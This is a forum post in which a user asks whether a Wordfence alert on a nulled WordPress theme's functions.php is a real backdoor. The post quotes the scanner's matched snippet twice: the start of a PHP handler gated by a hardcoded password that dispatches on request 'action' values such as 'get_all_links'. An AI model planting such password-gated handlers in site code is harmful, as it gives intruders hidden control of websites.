wpblog
Registered Member
- Oct 19, 2010
- 80
- 23
I use Shcema theme (download from BHW) for my WordPress site.
The Wordfence scans and shows
Do you know if this is really the backdoor malicious, or just because the theme is nulled and is not harmful?
thanks
The Wordfence scans and shows
"File appears to be malicious: wp-content/themes/schema/functions.php"
"The text we found in this file that matches a known malicious file is: "<?php\x0a\x0aif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '21c80d6207ab65a7c5cfbb0065cb77e5'))\x0a\x09{\x0a\x09\x09switch ($_REQUEST['action'])\x0a\x09\x09\x09{\x0a\x09\x09\x09\x09case 'get_all_links'". The infection type is: Backdoor PHP/get_all_links."
"The text we found in this file that matches a known malicious file is: "<?php\x0a\x0aif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '21c80d6207ab65a7c5cfbb0065cb77e5'))\x0a\x09{\x0a\x09\x09switch ($_REQUEST['action'])\x0a\x09\x09\x09{\x0a\x09\x09\x09\x09case 'get_all_links'". The infection type is: Backdoor PHP/get_all_links."
Do you know if this is really the backdoor malicious, or just because the theme is nulled and is not harmful?
thanks
Last edited: